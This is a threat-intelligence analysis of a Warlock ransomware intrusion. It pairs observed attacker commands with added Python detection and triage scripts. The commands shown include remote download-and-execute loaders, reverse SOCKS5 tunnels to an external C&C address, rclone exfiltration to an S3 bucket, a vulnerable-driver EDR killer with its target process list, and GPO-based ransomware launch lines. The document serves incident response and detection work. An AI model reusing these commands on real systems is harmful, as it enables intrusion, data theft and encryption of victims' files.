Web Shells, Tunnels, and Ransomware: Dissecting a Warlock Attack
Following initial access, the threat actors conducted extensive lateral movement using a combination of legitimate administration tools and credential abuse. As a result, they gained control of the DC, reset the password of the built-in Administrator account, and added a domain group ("<REDACTED>\Desktop Admins") to the DC's Administrators group, indicating full domain-level compromise:
net user administrator <REDACTED>
net localgroup Administrators "<REDACTED>\Desktop Admins" /ADD
PsExec
Lateral movement with PsExec was evidenced by execution of the PSEXESVC service process and the artifact C:\Windows\PSEXEC<REDACTED>.key, consistent with remote command execution across the domain. Besides PsExec, several other tools were used as secondary options for remote monitoring and control of hosts.
TightVNC
PsExec was used to run msiexec.exe with the /i switch against a remote URL, which downloads and silently installs the TightVNC package. The MSI properties install only the server component, register it as a service, add a firewall exception and set the VNC password in a single step, so the host becomes reachable over VNC without any interactive setup:
C:\windows\system32\msiexec.exe /i hxxps[://]www[.]tightvnc[.]com/download/2.8.85/tightvnc-2.8.85-gpl-setup-64bit[.]msi /q /norestart ADDLOCAL=Server SERVER_REGISTER_AS_SERVICE=1 SERVER_ADD_FIREWALL_EXCEPTION=1 SET_PASSWORD=1 VALUE_OF_PASSWORD=[REDACTED]
PowerShell Remoting (PSRemoting)
PSRemoting, a built-in Windows feature for remote administration, was also enabled and used to execute PowerShell commands on remote systems. The -SkipNetworkProfileCheck switch lets the cmdlet succeed even when a network connection is on the Public profile, where it would otherwise refuse to open the WinRM firewall rule:
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe "Enable-PSRemoting -Force -SkipNetworkProfileCheck"
RDP Patcher/Wrapper
RDP Wrapper patches client editions of Windows, which normally permit only one interactive session, to allow concurrent RDP sessions. Because the attacker's session no longer displaces a logged-on user, that user is less likely to notice or disconnect it, which keeps the activity out of sight.
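The lateral-movement tooling above leaves distinctive process-creation traces. The following is an added example (not code from the original report) of hunting rules that encode them: the PSEXESVC service image, msiexec /i pulling an MSI from a URL, Enable-PSRemoting with -SkipNetworkProfileCheck, additions to the local Administrators group, a password set on the built-in Administrator, and the parent/child chain of anything spawned by PSEXESVC. The records are constructed to resemble Windows Security 4688 / Sysmon event 1 fields; the hostnames, paths and the download URL are assumptions for illustration.

```python
"""Hunting rules for the lateral-movement tooling described above.

Added example, not code from the original report. The records below are
constructed to resemble Windows Security 4688 / Sysmon event 1 fields;
hostnames, paths and the download URL are assumptions for illustration.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent: str   # full path of the parent process image
    image: str    # full path of the created process image
    cmdline: str


# (rule name, regex, which field it is applied to). Matching is done on the
# lower-cased field value, so every pattern is written in lower case.
RULES = [
    # PsExec drops PSEXESVC.exe into %SystemRoot% and runs it as a service
    ("psexec_service", re.compile(r"\\psexesvc\.exe$"), "image"),
    # msiexec installing straight from a URL, as with the TightVNC package
    ("msiexec_remote_url", re.compile(r'msiexec(\.exe)?\b.*\s/i\s+"?https?://'), "cmdline"),
    # WinRM enabled regardless of network profile
    ("psremoting_enabled", re.compile(r"enable-psremoting\b.*-skipnetworkprofilecheck\b"), "cmdline"),
    # a principal added to the local Administrators group
    ("local_admin_added", re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+.+\s/add\b"), "cmdline"),
    # 'net user administrator <pw>' sets a password; a bare query has no third token
    ("builtin_admin_pw_set", re.compile(r"\bnet1?(\.exe)?\s+user\s+administrator\s+(?!/)\S+"), "cmdline"),
]


def evaluate(ev: ProcEvent) -> list[str]:
    """Return the names of every rule that fires for a single event."""
    fired = []
    for name, rx, field in RULES:
        text = (ev.image if field == "image" else ev.cmdline).lower()
        if rx.search(text):
            fired.append(name)
    # Chain rule: any child of the PsExec service process is remote execution,
    # whatever the child's own command line looks like.
    if ev.parent.lower().endswith("\\psexesvc.exe"):
        fired.append("spawned_by_psexec")
    return fired


def hunt(events):
    """Flatten (rule, host, command line) tuples for every firing rule."""
    return [(name, ev.host, ev.cmdline) for ev in events for name in evaluate(ev)]


# Constructed sample telemetry: the first five records mirror the activity in
# the report, the last two are benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    ProcEvent("DC01", r"c:\windows\system32\services.exe", r"c:\windows\psexesvc.exe",
              r"c:\windows\psexesvc.exe"),
    ProcEvent("WS07", r"c:\windows\psexesvc.exe", r"c:\windows\system32\msiexec.exe",
              r"c:\windows\system32\msiexec.exe /i https://www.example.invalid/tightvnc-setup-64bit.msi "
              r"/q /norestart ADDLOCAL=Server SERVER_REGISTER_AS_SERVICE=1 SET_PASSWORD=1 VALUE_OF_PASSWORD=x"),
    ProcEvent("WS07", r"c:\windows\psexesvc.exe", r"c:\windows\system32\windowspowershell\v1.0\powershell.exe",
              r'powershell.exe "Enable-PSRemoting -Force -SkipNetworkProfileCheck"'),
    ProcEvent("DC01", r"c:\windows\system32\cmd.exe", r"c:\windows\system32\net.exe",
              r'net localgroup Administrators "CORP\Desktop Admins" /ADD'),
    ProcEvent("DC01", r"c:\windows\system32\cmd.exe", r"c:\windows\system32\net.exe",
              r"net user administrator Sup3r-Secret"),
    ProcEvent("WS03", r"c:\windows\system32\cmd.exe", r"c:\windows\system32\net.exe",
              r"net localgroup Administrators"),
    ProcEvent("WS03", r"c:\windows\system32\cmd.exe", r"c:\windows\system32\msiexec.exe",
              r"msiexec.exe /i C:\installers\7zip.msi /qn"),
]

if __name__ == "__main__":
    for rule, host, cmd in hunt(SAMPLE_EVENTS):
        print(f"{host:6} {rule:22} {cmd[:70]}")
```

The parent-process chain rule is the one worth keeping even if the others are tuned away: a TightVNC install or an Enable-PSRemoting that was launched by PSEXESVC is remote execution by definition, whatever the child command line looks like.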
Command-and-control
Tunneling tools, C&C agents and several other utilities were used to maintain the threat actors' persistence and to facilitate their communications within the private network.
Velociraptor
The threat actors continued to abuse Velociraptor (version 0.73.4) as their primary C&C framework, repurposing the legitimate Digital Forensics and Incident Response (DFIR) tool for stealth. This is part of a consistent pattern of dual-use tool abuse, previously documented by external researchers, in which the group's infrastructure has evolved from Velociraptor to include VS Code and Cloudflare Tunnel for C&C communications.
The Velociraptor installer was disguised as "v4.msi" and hosted in Supabase storage, again installed silently by msiexec straight from the URL:
C:\Windows\System32\msiexec.exe /q /i hxxps[://]vdfccjpnedujhrzscjtq[.]supabase[.]co/storage/v1/object/public/image/v4[.]msi
VS Code
Following installation, Velociraptor was used to download the VS Code CLI with an encoded PowerShell command (shown here decoded):
Invoke-WebRequest -Uri "https://vscode.download.prss.microsoft.com/dbazure/download/insider/09401e712d4ffa5e497787978fe90c1557a0092b/vscode_cli_win32_x64_cli.zip" -OutFile "C:\ProgramData\Microsoft\AppV\code.zip"
We observed three related PowerShell executions through Velociraptor, all following the same fileless execution pattern:
- Downloading remote bytes,
- Loading them directly into memory via [Reflection.Assembly]::Load(), and
- Executing them with .EntryPoint.Invoke().
Each execution supplied the same “4567” command-line argument to the entry point of the payload, thereby indicating that the payload was executed with a consistent and predefined runtime parameter across all runs.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;[Reflection.Assembly]::Load((New-Object Net.WebClient).DownloadData('hxxps://litter[.]catbox[.]moe/zqqxb3.txt')).EntryPoint.Invoke($null, (, [string[]] ("4567")))
[Reflection.Assembly]::Load((New-Object Net.WebClient).DownloadData('hxxps://files[.]catbox[.]moe/wzsjlw.dll')).EntryPoint.Invoke($null, (, [string[]] ("4567")))
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;[Reflection.Assembly]::Load((New-Object Net.WebClient).DownloadData('hxxps://litter[.]catbox[.]moe/uaw2gm.txt')).EntryPoint.Invoke($null, (, [string[]] ("4567")))
Pivoting from the referenced URLs and file names to VirusTotal showed that they resolved to wssocks.exe, a .NET payload designed for in-memory execution. This matches the observed technique: the bytes are downloaded and run via Assembly.Load() and EntryPoint.Invoke() without ever being written to disk.
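The reflective-loading chain above can be pulled apart mechanically. The following added example (not code from the original report) takes records in the bracketed, escaped form in which the executions were logged, treats each record as a JSON array of script strings (an assumption about the log source), decodes them, extracts the download URL and the argument handed to EntryPoint.Invoke, and checks whether one argument is reused across runs as "4567" was here. The URLs in the sample records are constructed stand-ins for the real hosting locations.

```python
"""Decode and triage PowerShell reflective-loader one-liners.

Added example, not code from the original report. Records are assumed to be
JSON arrays of script strings (the bracketed, escaped form seen above);
the URLs below are constructed stand-ins for the real hosting locations.
"""
import json
import re
from urllib.parse import urlparse

# [Reflection.Assembly]::Load((New-Object Net.WebClient).DownloadData('<url>'))
#     .EntryPoint.Invoke($null, (, [string[]] ("<arg>")))
REFLECTIVE_RX = re.compile(
    r"\[reflection\.assembly\]::load\("
    r"\(new-object\s+net\.webclient\)\.downloaddata\(\s*'(?P<url>[^']+)'\s*\)"
    r"\)\.entrypoint\.invoke\(\s*\$null\s*,\s*\(\s*,\s*\[string\[\]\]\s*\(\s*\"(?P<arg>[^\"]*)\"\s*\)\s*\)\s*\)",
    re.IGNORECASE,
)

# copy/paste and some log viewers turn ASCII quotes into typographic ones
SMART_QUOTES = str.maketrans({"\u2018": "'", "\u2019": "'", "\u201c": '"', "\u201d": '"'})


def decode_record(record: str) -> list[str]:
    """One record is a JSON array of scripts; normalise quotes and whitespace."""
    return [s.translate(SMART_QUOTES).strip() for s in json.loads(record)]


def analyze_script(script: str):
    """Return loader details if the script matches the in-memory load pattern, else None."""
    m = REFLECTIVE_RX.search(script)
    if not m:
        return None
    url = m.group("url")
    return {
        "url": url,
        "file_hint": urlparse(url).path.rsplit("/", 1)[-1],
        "entry_arg": m.group("arg"),
        # two of the three runs pin TLS 1.2 before downloading
        "forces_tls12": "securityprotocoltype]::tls12" in script.lower(),
    }


def triage(records):
    findings = []
    for rec in records:
        for script in decode_record(rec):
            f = analyze_script(script)
            if f:
                findings.append(f)
    return findings


def shared_entry_arg(findings):
    """The single argument used by every loader run, or None if they differ."""
    args = {f["entry_arg"] for f in findings}
    return args.pop() if len(args) == 1 else None


SAMPLE_RECORDS = [  # constructed; mirrors the three executions plus one benign script
    r'''["\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;[Reflection.Assembly]::Load((New-Object Net.WebClient).DownloadData('https://paste.example.invalid/zqqxb3.txt')).EntryPoint.Invoke($null, (, [string[]] (\"4567\")))"]''',
    r'''["[Reflection.Assembly]::Load((New-Object Net.WebClient).DownloadData('https://files.example.invalid/wzsjlw.dll')).EntryPoint.Invoke($null, (, [string[]] (\"4567\"))) "]''',
    r'''["[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;[Reflection.Assembly]::Load((New-Object Net.WebClient).DownloadData('https://paste.example.invalid/uaw2gm.txt')).EntryPoint.Invoke($null, (, [string[]] (\"4567\"))) \n"]''',
    r'''["Get-Process | Where-Object { $_.CPU -gt 100 }"]''',
]

if __name__ == "__main__":
    found = triage(SAMPLE_RECORDS)
    for f in found:
        print(f["file_hint"], f["entry_arg"], "tls12" if f["forces_tls12"] else "")
    print("shared argument:", shared_entry_arg(found))
```

A shared entry-point argument across runs is what tells you the three downloads are the same tool with the same configuration (here, most plausibly a port or channel number) rather than three unrelated payloads, and the file hint (.txt versus .dll) is only the hosting name, not the content type.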
Cloudflare Tunnel
The commands below show how the threat actors configured Cloudflare Tunnel for C&C communications. After installing cloudflared via MSI, they first registered it as a persistent Windows service with service install and a pre-configured token, ensuring the tunnel would survive reboots. The tunnel run --token command then authenticated the compromised machine to the attacker's Cloudflare account and established a named tunnel. Approximately 50 minutes later, the attacker also created a quick tunnel with tunnel --url http://127.0.0.1:80, which exposes a local HTTP server through a Cloudflare-provided public URL, likely as a secondary access path to proxy traffic to the compromised SharePoint server.
Persistent service registration: "C:\Program Files (x86)\cloudflared\cloudflared.exe" service install <TOKEN>
Named tunnel execution: "C:\Program Files (x86)\cloudflared\cloudflared.exe" tunnel run --token <TOKEN>
Quick tunnel (ad-hoc reverse proxy to a local web server): cloudflared.exe tunnel --url http://127.0.0.1:80
C&C Tunneling via VS Code CLI
The threat actors leveraged VS Code's built-in tunneling capability to establish a covert C&C channel. By downloading the VS Code CLI and running it in tunnel service mode, they created a legitimate-looking connection that blends in with developer traffic. The CLI was run from C:\windows\debug with a per-user data directory; tunnel service internal-run is the form the CLI uses when it runs as a background service:
Invoke-WebRequest -Uri "https://vscode.download.prss.microsoft.com/dbazure/download/insider/09401e712d4ffa5e497787978fe90c1557a0092b/vscode_cli_win32_x64_cli.zip" -OutFile "C:\ProgramData\Microsoft\AppV\code.zip"
"C:\windows\debug\code-insiders.exe" --verbose --cli-data-dir C:\Users\[REDACTED]\.vscode\cli tunnel service internal-run --log-to-file C:\Users\[REDACTED]\.vscode\cli\tunnel-service.log
Yuze
We identified the use of a new, lightweight open-source tunneling tool called Yuze. Written purely in C, it is designed for intranet penetration and supports forward and reverse SOCKS5 proxy tunneling. The threat actors executed it through rundll32, calling the RunYuze export of yuze.dll:
rundll32 yuze.dll,RunYuze reverse -c 198[.]13[.]158[.]193:80
rundll32 yuze.dll,RunYuze reverse -c 198[.]13[.]158[.]193:443
rundll32 yuze.dll,RunYuze reverse -c 198[.]13[.]158[.]193:53 (DNS port)
These commands establish a reverse SOCKS5 proxy connection to the attacker's external C&C server across multiple ports: HTTP (80), HTTPS (443) and DNS (53). The sequential port rotation suggests the attacker was probing for an open egress path through the victim's firewall; port 53 is a common choice because outbound DNS is typically permitted. This addition to the toolkit shows a continued shift toward stealthy, cross-platform utilities for persistence and lateral movement.
Traffic analysis points to 198[.]13[.]158[.]193 as the primary C&C endpoint. The address is registered to blnwx[.]com, a provider of Virtual Private Server (VPS) hosting. Other reports have noted multiple high-profile ransomware groups using this same infrastructure for second-stage operations.
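The port rotation above is visible in network telemetry as one process on one host trying a single external address on several ports in quick succession, and the attempts that completed tell you which egress path the firewall allowed. The following added example (not code from the original report) runs that correlation, plus a check for port-53 traffic to anything other than the organisation's resolvers, over constructed connection records shaped like Sysmon event 3 fields. The addresses are documentation-range stand-ins and the internal network ranges and resolver list are assumptions about the environment.

```python
"""Spot egress probing and rogue DNS-port traffic in connection telemetry.

Added example, not code from the original report. Records are constructed
to resemble Sysmon event 3 fields (timestamp, host, image, destination,
port, whether the connection completed). Addresses are documentation-range
stand-ins; the internal ranges and resolver list are assumptions.
"""
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
INTERNAL_RESOLVERS = {"10.0.0.2"}          # assumption: the org's DNS servers
PROBE_WINDOW = timedelta(minutes=10)


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def detect_port_rotation(conns, min_ports=3, window=PROBE_WINDOW):
    """Same host+process hitting one external IP on >= min_ports ports within a window.

    The Yuze reverse commands cycle 80 -> 443 -> 53 against a single address;
    the ports that completed show which egress path the firewall permitted.
    """
    by_target = defaultdict(list)
    for ts, host, image, ip, port, completed in conns:
        if not is_internal(ip):
            by_target[(host, image.lower(), ip)].append((datetime.fromisoformat(ts), port, completed))
    findings = []
    for (host, image, ip), attempts in by_target.items():
        attempts.sort()
        for i, (t0, _, _) in enumerate(attempts):
            in_window = [a for a in attempts[i:] if a[0] - t0 <= window]
            ports = sorted({p for _, p, _ in in_window})
            if len(ports) >= min_ports:
                findings.append({
                    "host": host, "image": image, "dst": ip, "ports": ports,
                    "open_egress": sorted({p for _, p, ok in in_window if ok}),
                })
                break          # one finding per target is enough
    return findings


def detect_rogue_dns_port(conns, resolvers=INTERNAL_RESOLVERS):
    """Port-53 traffic that does not go to a known resolver: C&C riding the DNS port."""
    return [(host, image, ip) for _, host, image, ip, port, _ in conns
            if port == 53 and ip not in resolvers and not is_internal(ip)]


SAMPLE_CONNS = [  # constructed: (timestamp, host, image, dst_ip, dst_port, completed)
    ("2025-10-02T09:14:03", "WS11", r"c:\windows\system32\rundll32.exe", "203.0.113.77", 80, False),
    ("2025-10-02T09:14:41", "WS11", r"c:\windows\system32\rundll32.exe", "203.0.113.77", 443, False),
    ("2025-10-02T09:15:10", "WS11", r"c:\windows\system32\rundll32.exe", "203.0.113.77", 53, True),
    ("2025-10-02T09:20:00", "WS11", r"c:\program files\mozilla firefox\firefox.exe", "198.51.100.9", 443, True),
    ("2025-10-02T09:20:05", "WS11", r"c:\windows\system32\svchost.exe", "10.0.0.2", 53, True),
]

if __name__ == "__main__":
    for f in detect_port_rotation(SAMPLE_CONNS):
        print(f"{f['host']} {f['image']} -> {f['dst']} tried {f['ports']}, completed on {f['open_egress']}")
    print("non-resolver port-53 traffic:", detect_rogue_dns_port(SAMPLE_CONNS))
```

The second check is the cheaper one to deploy: if egress on 53 is restricted to the resolvers at the firewall, the third Yuze attempt fails too, and the rule reduces to "anything else talking on 53 is wrong".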
In our previous report, the threat actors renamed rclone.exe to TrendSecurity.exe to appear legitimate. In this incident, the file named TrendSecurity.exe was instead a loader that abused the vulnerable NSecKrnl.sys driver (a bring-your-own-vulnerable-driver, or BYOVD, attack) to continuously terminate security processes. Deployed through GPO, it systematically disabled security software throughout the compromised environment.
The attack worked in two stages. First, the loader registered the vulnerable NSecKrnl.sys as a kernel driver service. Note the binary path: the driver was loaded from a user profile directory rather than from System32\drivers, which is itself a strong detection signal:
sc create NSecKrnl binPath= "c:\users\[REDACTED]\NSecKrnl.sys" type=filesys
Once the vulnerable driver was loaded, TrendSecurity.exe used it to continuously terminate security product processes from kernel mode, bypassing user-mode protections. Binary analysis revealed that the tool targeted over 30 processes across major security vendors, with a particular focus on TrendAI™ products:
| Vendor | Targeted Processes |
|---|---|
| TrendAI™ | Ntrtscan.exe, TmListen.exe, PccNTMon.exe, TMBMSRV.exe, TmCCSF.exe, TmExtIns.exe, TmWatchdog.exe, TmSSClient.exe, TmPfw.exe, TmProxy.exe, ds_monitor.exe, dsa.exe, dsvp.exe |
| CrowdStrike | CSFalconService.exe, csfalconservice.exe, CsFalconConnector.exe, CSFalconController.exe, CSFalconContainer.exe, CsScan.exe, CsScanCli.exe |
| Microsoft | MsMpEng.exe, MpCmdRun.exe, MpDefenderCoreService.exe, MpDlpService.exe |
| Symantec | ccSvcHst.exe, sepWscSvc64.exe |
Table 1. Targeted processes
The NSec-Killer tool is publicly available on GitHub; the threat actors customized its implementation for this incident.
Note that these processes are protected by agent self-protection technology: attempts to terminate them are automatically blocked and raise immediate, high-fidelity alerts in the management console, giving defenders a critical opportunity to detect and respond to tampering in real time.
The threat actors continue to use a renamed copy of the legitimate tool rclone.exe (here disguised as TrendFileSecurityCheck.exe) to exfiltrate data, a technique previously documented in their campaigns. By repurposing a widely trusted file synchronization utility, they aim to blend their transfers with legitimate administrative or backup traffic. This evades simple signature-based detection and complicates behavioral analysis, because the tool's network activity can look benign without deeper context.
The command below shows the threat actors copying data from a targeted file share directly to an attacker-controlled S3 bucket. The include filter targets office documents and CAD/engineering formats (DWG, DXF, STEP, IPT, PRT, IGES and others), limited to files modified within the last 500 days and no larger than 2000 MiB, with 11 parallel transfers; --ignore-existing lets the job be re-run without re-uploading what was already taken:
TrendFileSecurityCheck.exe copy \\REDACTED\REDACTED :s3:REDACTED/src -P --include "*.{pdf,ai,dwg,dxf,dwt,doc,docx,dwg,dwt,dws,shx,pat,lin,ctb,dxf,dwf,step,stl,dst,dxb,,stp,ipt,prt,iges,obj,xlsx,doc,xls,csv,ppt,pptx}" -q --ignore-existing --auto-confirm --multi-thread-streams 11 --transfers 11 --max-age 500d --max-size 2000m
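Scoping what such a command actually took is part of the response, and the filter semantics are not obvious from the flags alone. The following added example (not code from the original report, nor rclone's own code) parses the copy invocation, expands the brace pattern into individual globs, and applies rclone's filter rules as documented (case-sensitive matching unless --ignore-case; a bare size number is KiB, so 2000m is 2000 MiB) to a constructed file inventory. It also shows that the doubled comma in the original pattern expands to a dead glob of "*." rather than matching everything. The share, file names, sizes and timestamps are assumptions.

```python
"""Model what the rclone command above would actually select for upload.

Added example, not code from the original report or from rclone. Parses the
rclone copy invocation (--include brace pattern, --max-age, --max-size),
expands the braces into globs and applies rclone's documented filter
semantics to a constructed inventory. Share, names and sizes are assumptions.
"""
import fnmatch
import re
import shlex
from datetime import datetime, timedelta


def expand_braces(pattern: str) -> list[str]:
    """'*.{a,b}' -> ['*.a', '*.b']; multiple or nested groups expand recursively."""
    m = re.search(r"\{([^{}]*)\}", pattern)
    if not m:
        return [pattern]
    head, tail = pattern[:m.start()], pattern[m.end():]
    out = []
    for alt in m.group(1).split(","):
        out.extend(expand_braces(head + alt + tail))
    return out


def parse_size(text: str) -> int:
    """rclone SizeSuffix: 2000m = 2000 MiB; a bare number is KiB."""
    m = re.fullmatch(r"(\d+(?:\.\d+)?)([bkmgtp]?)", text.lower())
    mult = {"b": 1, "": 1024, "k": 1024, "m": 1024 ** 2, "g": 1024 ** 3, "t": 1024 ** 4, "p": 1024 ** 5}
    return int(float(m.group(1)) * mult[m.group(2)])


def parse_duration(text: str) -> timedelta:
    """rclone duration: 500d, 36h, 2w ... (month and year suffixes omitted here)."""
    m = re.fullmatch(r"(\d+(?:\.\d+)?)(ms|s|m|h|d|w)", text.lower())
    unit = {"ms": timedelta(milliseconds=1), "s": timedelta(seconds=1), "m": timedelta(minutes=1),
            "h": timedelta(hours=1), "d": timedelta(days=1), "w": timedelta(weeks=1)}[m.group(2)]
    return float(m.group(1)) * unit


def parse_rclone_copy(cmdline: str):
    # posix=False keeps Windows backslashes intact; quotes are stripped by hand
    toks = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    i = toks.index("copy")
    src, dst = toks[i + 1], toks[i + 2]
    opts = {"include": [], "max_age": None, "max_size": None, "ignore_case": False}
    j = i + 3
    while j < len(toks):
        t = toks[j]
        if t == "--include":
            opts["include"].extend(expand_braces(toks[j + 1])); j += 2
        elif t == "--max-age":
            opts["max_age"] = parse_duration(toks[j + 1]); j += 2
        elif t == "--max-size":
            opts["max_size"] = parse_size(toks[j + 1]); j += 2
        elif t in ("--transfers", "--multi-thread-streams", "--checkers"):
            j += 2                       # valued flags that do not affect selection
        elif t == "--ignore-case":
            opts["ignore_case"] = True; j += 1
        else:
            j += 1                       # -P, -q, --ignore-existing, --auto-confirm ...
    return src, dst, opts


def select_files(inventory, opts, now):
    """Return the paths rclone would transfer, in inventory order."""
    pats = [p.lower() for p in opts["include"]] if opts["ignore_case"] else opts["include"]
    chosen = []
    for path, size, mtime in inventory:
        name = path.rsplit("/", 1)[-1]
        name = name.lower() if opts["ignore_case"] else name
        if pats and not any(fnmatch.fnmatchcase(name, p) for p in pats):
            continue
        if opts["max_size"] is not None and size > opts["max_size"]:
            continue
        if opts["max_age"] is not None and now - mtime > opts["max_age"]:
            continue
        chosen.append(path)
    return chosen


SAMPLE_CMD = (r'rclone.exe copy \\fs01\projects :s3:exfil-bucket/src -P '
              r'--include "*.{pdf,dwg,dxf,docx,step,dxb,,stp,xlsx,csv}" -q --ignore-existing '
              r'--multi-thread-streams 11 --transfers 11 --max-age 500d --max-size 2000m')
NOW = datetime(2025, 10, 1)
MIB = 1024 ** 2
INVENTORY = [  # constructed: (relative path, size in bytes, last modified)
    ("engineering/plant-layout.dwg", 48 * MIB, datetime(2025, 8, 3)),
    ("finance/q2-report.xlsx", 900_000, datetime(2025, 7, 19)),
    ("archive/old-spec.pdf", 2_000_000, datetime(2019, 1, 5)),       # older than 500 days
    ("cad/full-site-scan.dwg", 3_000 * MIB, datetime(2025, 9, 1)),   # larger than 2000 MiB
    ("cad/assembly.STEP", 12_000_000, datetime(2025, 9, 20)),        # case differs, no --ignore-case
    ("docs/readme.txt", 3_000, datetime(2025, 9, 30)),               # extension not in the list
]

if __name__ == "__main__":
    src, dst, opts = parse_rclone_copy(SAMPLE_CMD)
    print(f"{src} -> {dst}: {len(opts['include'])} globs, including the dead pattern '*.'")
    print(select_files(INVENTORY, opts, NOW))
```

Run against a real listing of the targeted share (with the rclone binary's own mtime as a bound on "now"), the output is the candidate exfiltration set; everything the selection excludes can be scoped out of the breach assessment.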
Impact: Ransomware Deployment via GPO
The threat actors weaponize Active Directory Group Policy for mass malware distribution. Ransomware components are staged in the SYSVOL and NETLOGON shares, which replicate automatically to every DC and are readable by all domain-joined systems:
\\[VICTIM-DOMAIN]\SYSVOL\[VICTIM-DOMAIN]\scripts\run\run.dll
\\[VICTIM-DOMAIN]\SYSVOL\[VICTIM-DOMAIN]\scripts\Trend\TrendSecurity.exe
\\[VICTIM-DC]\netlogon\run.bat
\\[VICTIM-DOMAIN]\SysVol\[VICTIM-DOMAIN]\Policies\{5810DB21-959D-45BD-AF4C-0228CEC3C46A}\Machine\Scripts\Startup\CentralStartup.cmd
The deployment script copies the BYOVD tool from SYSVOL to the local system and runs it, with errors suppressed so that failures do not surface:
copy \\[VICTIM-DOMAIN]\SYSVOL\[VICTIM-DOMAIN]\scripts\Trend\* c:\users\public /y & start /B cmd /c "c:\users\public\TrendSecurity.exe 2>nul || exit"
Because this is a computer startup script, deployment happens automatically the next time each machine in the GPO's scope boots, enabling rapid enterprise-wide infection without individually accessing any system. (Startup scripts execute at boot, not on the periodic Group Policy background refresh, so a reboot is what triggers them.)
The primary ransomware payload is run.dll, which exports a function named RunCryptor that performs the actual file encryption. The threat actors employed multiple execution methods to maximize encryption coverage.
The primary execution method uses rundll32.exe to invoke the RunCryptor export:
rundll32 c:\users\public\run.dll,RunCryptor
Alternative execution paths include running the standalone run.exe executable and calling the DLL directly from the SYSVOL share:
start /B cmd /c "c:\users\public\run.exe 2>nul || exit"
start /B cmd /c "rundll32 \\[VICTIM-DOMAIN]\SYSVOL\[VICTIM-DOMAIN]\scripts\run\run.dll,RunCryptor 2>nul || exit"
Following encryption, the ransomware then drops a ransom note named lockdatareadme.txt on affected systems.
